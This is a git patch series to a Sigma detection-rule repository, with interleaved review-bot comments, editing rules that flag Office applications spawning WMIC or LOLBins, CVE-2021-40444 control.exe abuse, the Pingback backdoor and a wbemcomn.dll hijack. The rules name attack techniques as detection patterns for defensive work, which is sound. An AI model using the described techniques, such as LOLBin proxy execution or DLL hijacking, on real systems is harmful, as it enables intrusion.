diff --git a/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml b/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml index 0a3bd7cc..7b25e621 100644 --- a/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml +++ b/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml @@ -25,8 +25,8 @@ detection: - '*mshta*' - '*verclsid*' selection2: - - Image: '*\wbem\WMIC.exe' - - ProcessCommandLine: '*wmic *' + - Image|endswith: '\wbem\WMIC.exe' + - ProcessCommandLine|contains: 'wmic ' selection3: ParentImage|endswith: - winword.exe From 49df2358def45834825efe66870e240528eaf703 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Wed, 8 Sep 2021 21:12:27 -0600 Subject: [PATCH 0798/1367] Completed changes to selection1 completed changes to selection1 to comply with rule creation guide with no ( * ) or ( \\ ) - Image|endswith: '\wbem\WMIC.exe' - ProcessCommandLine|contains: 'wmic ' --- .../Monitor_Office_Applications_Spawning_WMI_command-line.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml index 2f5a5971..f8410024 100644 --- a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml +++ b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml @@ -18,8 +18,8 @@ logsource: detection: #useful_information: Add more office applications to the rule logic of choice selection1: - - Image: '*\wbem\WMIC.exe' - - ProcessCommandLine: '*wmic *' + - Image|endswith: '\wbem\WMIC.exe' + - ProcessCommandLine|contains: 'wmic ' selection2: - ParentImage: - winword.exe 
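Review bot: `ProcessCommandLine` on the new `ProcessCommandLine|contains: 'wmic '` line is not the Sigma standard field for the process_creation category, which is `CommandLine`; unless a project field mapping defines it, backends will pass the name through unmapped and that branch of the selection will never match, whereas the sysmon copy of this rule (commit 0803, L1281) uses `CommandLine|contains: 'wmic '`. The same field name is used in the 0798 hunk on this line and in commit 0802 (L1280). The `Image|endswith: '\wbem\WMIC.exe'` rewrite is the right direction, as `Image` carries a full path and `endswith` is the appropriate modifier.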
From 5bbe3dec9bb6dfb97190e04c3139ebb8be793985 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Wed, 8 Sep 2021 21:14:58 -0600 Subject: [PATCH 0799/1367] Completed changes to selection1 and selection2 changes were completed to remove ( * ) and stay within rule creation guide: - Image|endswith: - '\winword.exe' - '\excel.exe' - '\powerpnt.exe' WMIcommand|contains: 'Win32_Process\:\:Create' --- ...Create_command_execution_by_Office_Applications.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml b/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml index 5f9e1589..d61ba1b6 100644 --- a/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml +++ b/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml @@ -20,12 +20,12 @@ detection: selection1: EventLog: EDR EventType: WMIExecution - WMIcommand: '*Win32_Process\:\:Create*' + WMIcommand|contains: 'Win32_Process\:\:Create' selection2: - - Image: - - '*\winword.exe' - - '*\excel.exe' - - '*\powerpnt.exe' + - Image|endswith: + - '\winword.exe' + - '\excel.exe' + - '\powerpnt.exe' condition: selection1 AND selection2 falsepositives: - Unknown From 77ee51dd768e08316d54d6f42a8eb2a7636b5457 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Wed, 8 Sep 2021 21:22:26 -0600 Subject: [PATCH 0800/1367] Changed the category Changed category to file_event --- ..._by_Office_applications_using_file_extentions.yml | 12 ++++-------- 1 file changed, 4 insertions(+), 8 deletions(-) 
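Review bot: The new `WMIcommand|contains: 'Win32_Process\:\:Create'` keeps the backslashes from the old wildcard form, but inside a single-quoted YAML scalar they are literal characters, and in Sigma a backslash before a non-wildcard character is itself a plain backslash; the resulting pattern searches for `Win32_Process\:\:Create` and will not match the `Win32_Process::Create` the rule is after. Colons need no escaping here, so the line should read `WMIcommand|contains: 'Win32_Process::Create'`. The `Image|endswith` list in selection2 with its leading `\` is correct.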
diff --git a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index dcfc0694..d56f39e3 100644 --- a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml @@ -14,19 +14,15 @@ status: experimental Date: 2021/08/23 logsource: product: Windows - category: process_creation + category: file_event detection: #useful_information: Please add more file extentions and magic bytes to the logic of your choice. selection1: - EventType: - - FileCreate - - FileRename - selection2: Image|endswith: - 'winword.exe' - 'excel.exe' - 'powerpnt.exe' - selection3: + selection2: FileName|endswith: - ".exe" - ".dll" @@ -38,10 +34,10 @@ detection: - ".bat" - ".scr" - ".proj" - selection4: + selection3: FileMagicBytes|startswith: - "4D5A" - condition: selection1 AND selection2 AND (selection3 OR selection4) + condition: selection1 AND (selection2 OR selection3) falsepositives: - Unknown level: high From 851dfeee46dfe0bf91aec43ba35480872e85b1af Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Wed, 8 Sep 2021 21:24:18 -0600 Subject: [PATCH 0801/1367] Changed selection2 condition changed from "\\wbem\\WmiPrvSE.exe" to "\wbem\WmiPrvSE.exe" to follow rule creation guidelines --- ...r_LOLBins_process_creations_with_Wmiprvse_parent_process.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml index cf7a2801..ba8d9851 100644 
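Review bot: The `Image|endswith` values kept in `selection1` (`'winword.exe'`, `'excel.exe'`, `'powerpnt.exe'`) have no leading path separator, so any image whose file name merely ends in those characters also satisfies the selection; the rule creation guide the commit messages cite uses the `'\winword.exe'` form, and the 0799 hunk on L1278 already writes it that way. Suggest `- '\winword.exe'`, `- '\excel.exe'` and `- '\powerpnt.exe'`. The condition simplification to `selection1 AND (selection2 OR selection3)` after dropping the `EventType` selection is consistent with the new `file_event` category.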
--- a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml +++ b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml @@ -26,7 +26,7 @@ detection: - 'verclsid' selection2: ParentImage|endswith: - - "\\wbem\\WmiPrvSE.exe" + - "\wbem\WmiPrvSE.exe" condition: selection1 AND selection2 falsepositives: - FPs are possible here, but some LOLBins weren't excluded for obvious reasons. From fe9b91c504b66d0032b565f8a2dc2e5f8359368e Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Wed, 8 Sep 2021 21:26:01 -0600 Subject: [PATCH 0802/1367] Completed changes to selection1 changed to the following to follow rule creation guidelines: - Image|endswith: '\wbem\WMIC.exe' - ProcessCommandLine|contains: 'wmic ' --- ...pplications_from_proxy_executing_regsvr32_with_payload.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml b/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml index ecb11a21..0dbd9903 100644 --- a/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml +++ b/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml @@ -18,8 +18,8 @@ logsource: detection: #useful_information: add more LOLBins to the rules logic of your choice. selection1: - - Image: '*\wbem\WMIC.exe' - - ProcessCommandLine: '*wmic *' + - Image|endswith: '\wbem\WMIC.exe' + - ProcessCommandLine|contains: 'wmic ' - OriginalFileName: 'wmic.exe' - Description: 'WMI Commandline Utility' selection2: From b2c44ebd6e797dede333841813a37e912a40a51e Mon Sep 17 00:00:00 2001 
From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Wed, 8 Sep 2021 21:27:15 -0600 Subject: [PATCH 0803/1367] Changed selection1 completed the following change to selection1 to keep inline with rule creation guideline - CommandLine|contains: 'wmic ' --- .../sysmon/Office_Applications_Spawning_WMI_command-line.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml index c38173bf..19f87e10 100644 --- a/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml +++ b/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml @@ -19,7 +19,7 @@ detection: #useful_information: Add more office applications to the rule logic of choice selection1: - Image: '\wbem\WMIC.exe' - - CommandLine: '*wmic *' + - CommandLine|contains: 'wmic ' - OriginalFileName: 'wmic.exe' - Description: 'WMI Commandline Utility' selection2: From caa5c7af1ae77459a2c639581e85723968c41b2c Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Thu, 9 Sep 2021 06:27:23 +0200 Subject: [PATCH 0804/1367] Update Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml --- ...ins_process_creations_with_Wmiprvse_parent_process.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml index 5404a30d..4858fc09 100644 --- a/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml +++ b/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml 
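Review bot: The sibling list item `- Image: '\wbem\WMIC.exe'` directly above the changed line is an exact match, and `Image` in process creation events carries the full path, so that entry can never match; it should be `- Image|endswith: '\wbem\WMIC.exe'`, which is what commit 0798 (L1277) used for the process_creation copy of this rule. The `CommandLine|contains: 'wmic '` change itself is consistent with the standard Sigma field names.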
@@ -1,4 +1,5 @@ title: Lolbins Process Creation with WmiPrvse +id: 0f33c4f0-5ac8-4462-a94a-e25d696ff5bf description: This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ @@ -25,9 +26,8 @@ detection: - 'mshta' - 'verclsid' selection2: - ParentImage|endswith: - - "\wbem\WmiPrvSE.exe" - condition: selection1 AND selection2 + ParentImage|endswith: \wbem\WmiPrvSE.exe + condition: selection1 and selection2 falsepositives: -- Unknown + - Unknown level: high From 312ffe69e2f36022f4901a01b4dad6e258433426 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Thu, 9 Sep 2021 06:28:48 +0200 Subject: [PATCH 0805/1367] Update Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml --- ..._process_creations_with_Wmiprvse_parent_process.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml index ba8d9851..abcb3bae 100644 --- a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml +++ b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml @@ -1,4 +1,5 @@ title: LOLBins Process Created With WmiPrvSE +id: f90d4ff4-db81-4576-9719-8ed45fe387c8 description: This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ @@ -11,7 +12,7 @@ tags: - attack.execution - attack.defence_evasion status: experimental -Date: 2021/08/23 +date: 2021/08/23 logsource: product: Windows category: process_creation 
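Review bot: This rule now exists twice in the tree with the same description and selection logic and only a different id: the process_creation copy with `id: 0f33c4f0-5ac8-4462-a94a-e25d696ff5bf` added here and the sysmon copy with `id: f90d4ff4-db81-4576-9719-8ed45fe387c8` added in the next commit (L1282–L1283). The same `process_creation/` versus `sysmon/` duplication applies to the Office/WMIC and executable-creation rules touched in commits 0795–0803. Unless the two copies are meant to diverge, keep one and, if both must stay, say why in the `description`. The lowercase `condition: selection1 and selection2` and the unquoted plain scalar `ParentImage|endswith: \wbem\WmiPrvSE.exe` both parse correctly.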
@@ -25,9 +26,8 @@ detection: - 'mshta' - 'verclsid' selection2: - ParentImage|endswith: - - "\wbem\WmiPrvSE.exe" - condition: selection1 AND selection2 + ParentImage|endswith: \wbem\WmiPrvSE.exe + condition: selection1 and selection2 falsepositives: -- FPs are possible here, but some LOLBins weren't excluded for obvious reasons. + - FPs are possible here, but some LOLBins weren't excluded for obvious reasons. level: high From 36a5d7ec0456e68e555069a3c3c7c38a8f5c00b5 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 9 Sep 2021 08:12:36 +0200 Subject: [PATCH 0806/1367] CVE-2021-40444 false positives --- .../process_creation/win_susp_control_cve_2021_40444.yml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml index b21c7012..61e9daed 100644 --- a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml +++ b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml @@ -7,6 +7,7 @@ references: - https://www.joesandbox.com/analysis/476188/1/iochtml author: '@neonprimetime, Florian Roth' date: 2021/09/08 +modified: 2021/09/09 logsource: category: process_creation product: windows @@ -17,7 +18,9 @@ detection: - '\winword.exe' - '\powerpnt.exe' - '\excel.exe' - condition: selection + filter: + CommandLine|endswith: '\control.exe input.dll' + condition: selection and not filter falsepositives: - Unknown level: high From 2777187fd96f825f8a52200b221f3bfe63dab873 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 9 Sep 2021 08:46:34 +0200 Subject: [PATCH 0807/1367] docs: changed level and reference in CVE-2021-40444 rule --- .../process_creation/win_susp_control_cve_2021_40444.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) 
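Review bot: `falsepositives: - Unknown` is left unchanged although this commit exists to exclude a known false positive via `filter: CommandLine|endswith: '\control.exe input.dll'`; the benign pattern should be recorded there so the next maintainer knows why the filter exists, e.g. `- Office applications launching 'control.exe input.dll' (excluded by the filter)`. A short comment on the filter line pointing to where the sighting came from would help for the same reason.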
diff --git a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml index 61e9daed..312b047b 100644 --- a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml +++ b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml @@ -3,6 +3,7 @@ id: 894397c6-da03-425c-a589-3d09e7d1f750 description: Detects a suspicious process pattern found in CVE-2021-40444 exploitation status: experimental references: + - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444 - https://twitter.com/neonprimetime/status/1435584010202255375 - https://www.joesandbox.com/analysis/476188/1/iochtml author: '@neonprimetime, Florian Roth' @@ -23,4 +24,5 @@ detection: condition: selection and not filter falsepositives: - Unknown -level: high +level: critical + From 015573c450ddb4d12ee127ffe1218aec90643087 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 9 Sep 2021 09:33:45 +0200 Subject: [PATCH 0808/1367] refactor: 2nd condition in CVE-2021-40444 rule --- .../process_creation/win_susp_control_cve_2021_40444.yml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml index 312b047b..41ce9647 100644 --- a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml +++ b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml @@ -13,15 +13,18 @@ logsource: category: process_creation product: windows detection: - selection: + selection1: Image|endswith: '\control.exe' ParentImage|endswith: - '\winword.exe' - '\powerpnt.exe' - '\excel.exe' + selection2: + Image|endswith: '\control.exe' + CommandLine|contains: '.cpl' filter: CommandLine|endswith: '\control.exe input.dll' - condition: selection and not filter + condition: ( selection1 or selection2 ) and not filter falsepositives: - Unknown level: critical 
From 6d86c7df6c35a6c980fc048fbc8a754bb323d7a2 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 9 Sep 2021 09:41:03 +0200 Subject: [PATCH 0809/1367] Revert "refactor: 2nd condition in CVE-2021-40444 rule" This reverts commit 015573c450ddb4d12ee127ffe1218aec90643087. --- .../process_creation/win_susp_control_cve_2021_40444.yml | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml index 41ce9647..312b047b 100644 --- a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml +++ b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml @@ -13,18 +13,15 @@ logsource: category: process_creation product: windows detection: - selection1: + selection: Image|endswith: '\control.exe' ParentImage|endswith: - '\winword.exe' - '\powerpnt.exe' - '\excel.exe' - selection2: - Image|endswith: '\control.exe' - CommandLine|contains: '.cpl' filter: CommandLine|endswith: '\control.exe input.dll' - condition: ( selection1 or selection2 ) and not filter + condition: selection and not filter falsepositives: - Unknown level: critical From f00aaf8461f97abec19f81aa4fc0edaa76ff6cf1 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 9 Sep 2021 12:55:10 +0200 Subject: [PATCH 0810/1367] refactor: exclude case in which upper ticks are used --- .../process_creation/win_susp_control_cve_2021_40444.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml index 312b047b..2a02b7ad 100644 --- a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml +++ b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml 
@@ -20,7 +20,9 @@ detection: - '\powerpnt.exe' - '\excel.exe' filter: - CommandLine|endswith: '\control.exe input.dll' + CommandLine|endswith: + - '\control.exe input.dll' + - '\control.exe" input.dll' condition: selection and not filter falsepositives: - Unknown From d9cd1652f244b572231316ae019f79548b34aa7a Mon Sep 17 00:00:00 2001 
From: frack113 Date: Thu, 9 Sep 2021 16:11:41 +0200 Subject: [PATCH 0811/1367] Split global sysmon rules --- ...ry_dns_hybridconnectionmgr_servicebus.yml} | 0 ...ve_2021_31979_cve_2021_33771_exploits.yml} | 25 +++------------ .../file_event_pingback_backdoor.yml | 24 ++++++++++++++ ...ile_event_wmiprvse_wbemcomn_dll_hijack.yml | 25 +++++++++++++++ .../image_load_pingback_backdoor.yml | 24 ++++++++++++++ ...age_load_wmiprvse_wbemcomn_dll_hijack.yml} | 20 +++--------- ...ing_windows_telemetry_for_persistence.yml} | 25 ++++----------- .../process_creation_pingback_backdoor.yml} | 31 +++---------------- ...sing_windows_telemetry_for_persistence.yml | 30 ++++++++++++++++++ ...cve_2021_31979_cve_2021_33771_exploits.yml | 31 +++++++++++++++++++ 10 files changed, 154 insertions(+), 81 deletions(-) rename rules/windows/{sysmon/sysmon_dns_hybridconnectionmgr_servicebus.yml => dns_query/dns_query_dns_hybridconnectionmgr_servicebus.yml} (100%) rename rules/windows/{sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml => file_event/file_event_cve_2021_31979_cve_2021_33771_exploits.yml} (77%) create mode 100644 rules/windows/file_event/file_event_pingback_backdoor.yml create mode 100644 rules/windows/file_event/file_event_wmiprvse_wbemcomn_dll_hijack.yml create mode 100644 rules/windows/image_load/image_load_pingback_backdoor.yml rename rules/windows/{sysmon/sysmon_wmiprvse_wbemcomn_dll_hijack.yml => image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml} (77%) rename rules/windows/{sysmon/sysmon_abusing_windows_telemetry_for_persistence.yml => process_creation/process_creation_abusing_windows_telemetry_for_persistence.yml} (70%) rename rules/windows/{sysmon/sysmon_pingback_backdoor.yml => process_creation/process_creation_pingback_backdoor.yml} (61%) create mode 100644 rules/windows/registry_event/registry_event_abusing_windows_telemetry_for_persistence.yml create mode 100644 rules/windows/registry_event/registry_event_cve_2021_31979_cve_2021_33771_exploits.yml 
diff --git a/rules/windows/sysmon/sysmon_dns_hybridconnectionmgr_servicebus.yml b/rules/windows/dns_query/dns_query_dns_hybridconnectionmgr_servicebus.yml similarity index 100% rename from rules/windows/sysmon/sysmon_dns_hybridconnectionmgr_servicebus.yml rename to rules/windows/dns_query/dns_query_dns_hybridconnectionmgr_servicebus.yml diff --git a/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml b/rules/windows/file_event/file_event_cve_2021_31979_cve_2021_33771_exploits.yml similarity index 77% rename from rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml rename to rules/windows/file_event/file_event_cve_2021_31979_cve_2021_33771_exploits.yml index 76de527b..c1f90858 100644 --- a/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml +++ b/rules/windows/file_event/file_event_cve_2021_31979_cve_2021_33771_exploits.yml @@ -1,10 +1,10 @@ -action: global title: CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum +id: ad7085ac-92e4-4b76-8ce2-276d2c0e68ef status: experimental description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum author: Sittikorn S date: 2021/07/16 -modified: 2021/08/06 +modified: 2021/09/09 references: - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/ - https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/ @@ -15,11 +15,6 @@ tags: - attack.t1566 - attack.t1203 # - threat_group.Sourgum -falsepositives: - - Unlikely -level: critical ---- -id: ad7085ac-92e4-4b76-8ce2-276d2c0e68ef logsource: product: windows category: file_event 
@@ -37,16 +32,6 @@ detection: - 'C:\Windows\system32\ime\IMEJP\WimBootConfigurations.ini' - 'C:\Windows\system32\ime\IMETC\WimBootConfigurations.ini' condition: selection ---- -id: 32b5db62-cb5f-4266-9639-0fa48376ac00 -logsource: - product: windows - category: registry_event -detection: - selection: - TargetObject|contains: - - '\Software\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32' - - '\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32' - keywords: - - IMJPUEXP.DLL - condition: selection and keywords +falsepositives: + - Unlikely +level: critical \ No newline at end of file diff --git a/rules/windows/file_event/file_event_pingback_backdoor.yml b/rules/windows/file_event/file_event_pingback_backdoor.yml new file mode 100644 index 00000000..5b9417ab --- /dev/null +++ b/rules/windows/file_event/file_event_pingback_backdoor.yml @@ -0,0 +1,24 @@ +title: Pingback Backdoor +id: 2bd63d53-84d4-4210-80ff-bf0658f1bf78 +status: experimental +description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report +author: Bhabesh Raj +date: 2021/05/05 +modified: 2021/09/09 +references: + - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel + - https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406 +tags: + - attack.persistence + - attack.t1574.001 +logsource: + product: windows + category: file_event +detection: + selection: + Image|endswith: updata.exe + TargetFilename: 'C:\Windows\oci.dll' + condition: selection +falsepositives: + - Very unlikely +level: high \ No newline at end of file diff --git a/rules/windows/file_event/file_event_wmiprvse_wbemcomn_dll_hijack.yml b/rules/windows/file_event/file_event_wmiprvse_wbemcomn_dll_hijack.yml new file mode 100644 index 00000000..07e01fa6 --- /dev/null +++ b/rules/windows/file_event/file_event_wmiprvse_wbemcomn_dll_hijack.yml 
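Review bot: `Image|endswith: updata.exe` in the new file_event rule has no leading backslash, so any image name that merely ends in those characters satisfies the selection; the hunk is a 1:1 move from the removed global rule, but the split is a good moment to tighten it to `Image|endswith: '\updata.exe'`. The image_load split of the same rule on L1290 has the same pattern with `Image|endswith: 'msdtc.exe'` and should become `'\msdtc.exe'`.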
@@ -0,0 +1,25 @@ +title: Wmiprvse Wbemcomn DLL Hijack +id: 614a7e17-5643-4d89-b6fe-f9df1a79641c +description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. +status: experimental +date: 2020/10/12 +modified: 2021/09/09 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +tags: + - attack.execution + - attack.t1047 + - attack.lateral_movement + - attack.t1021.002 +references: + - https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html +logsource: + product: windows + category: file_event +detection: + selection: + Image: System + TargetFilename|endswith: '\wbem\wbemcomn.dll' + condition: selection +falsepositives: + - Unknown +level: critical \ No newline at end of file diff --git a/rules/windows/image_load/image_load_pingback_backdoor.yml b/rules/windows/image_load/image_load_pingback_backdoor.yml new file mode 100644 index 00000000..fd9ed05c --- /dev/null +++ b/rules/windows/image_load/image_load_pingback_backdoor.yml @@ -0,0 +1,24 @@ +title: Pingback Backdoor +id: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b +status: experimental +description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report +author: Bhabesh Raj +date: 2021/05/05 +modified: 2021/09/09 +references: + - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel + - https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406 +tags: + - attack.persistence + - attack.t1574.001 +logsource: + product: windows + category: image_load +detection: + selection: + Image|endswith: 'msdtc.exe' + ImageLoaded: 'C:\Windows\oci.dll' + condition: selection +falsepositives: + - Very unlikely +level: high \ No newline at end of file 
diff --git a/rules/windows/sysmon/sysmon_wmiprvse_wbemcomn_dll_hijack.yml b/rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml similarity index 77% rename from rules/windows/sysmon/sysmon_wmiprvse_wbemcomn_dll_hijack.yml rename to rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml index 8b47fd5a..1b117e85 100644 --- a/rules/windows/sysmon/sysmon_wmiprvse_wbemcomn_dll_hijack.yml +++ b/rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml @@ -1,5 +1,5 @@ -action: global title: Wmiprvse Wbemcomn DLL Hijack +id: 7707a579-e0d8-4886-a853-ce47e4575aaa description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. status: experimental date: 2020/10/12 @@ -12,21 +12,6 @@ tags: - attack.t1021.002 references: - https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html -falsepositives: - - Unknown -level: critical ---- -id: 614a7e17-5643-4d89-b6fe-f9df1a79641c -logsource: - product: windows - category: file_event -detection: - selection: - Image: System - TargetFilename|endswith: '\wbem\wbemcomn.dll' - condition: selection ---- -id: 7707a579-e0d8-4886-a853-ce47e4575aaa logsource: product: windows category: image_load @@ -35,3 +20,6 @@ detection: Image|endswith: '\wmiprvse.exe' ImageLoaded|endswith: '\wbem\wbemcomn.dll' condition: selection +falsepositives: + - Unknown +level: critical diff --git a/rules/windows/sysmon/sysmon_abusing_windows_telemetry_for_persistence.yml b/rules/windows/process_creation/process_creation_abusing_windows_telemetry_for_persistence.yml similarity index 70% rename from rules/windows/sysmon/sysmon_abusing_windows_telemetry_for_persistence.yml rename to rules/windows/process_creation/process_creation_abusing_windows_telemetry_for_persistence.yml index 470b8f10..eeb51733 100644 
--- a/rules/windows/sysmon/sysmon_abusing_windows_telemetry_for_persistence.yml +++ b/rules/windows/process_creation/process_creation_abusing_windows_telemetry_for_persistence.yml @@ -1,5 +1,5 @@ -action: global title: Abusing Windows Telemetry For Persistence +id: f548a603-c9f2-4c89-b511-b089f7e94549 status: experimental description: Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type. references: @@ -11,32 +11,19 @@ tags: - attack.t1053 author: Sreeman date: 2020/09/29 -modified: 2021/07/15 +modified: 2021/09/09 fields: - EventID - CommandLine - TargetObject - Details -falsepositives: - - none -level: high ---- -id: 4e8d5fd3-c959-441f-a941-f73d0cdcdca5 -logsource: - product: windows - category: registry_event -detection: - selection: - TargetObject|contains: - - HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows 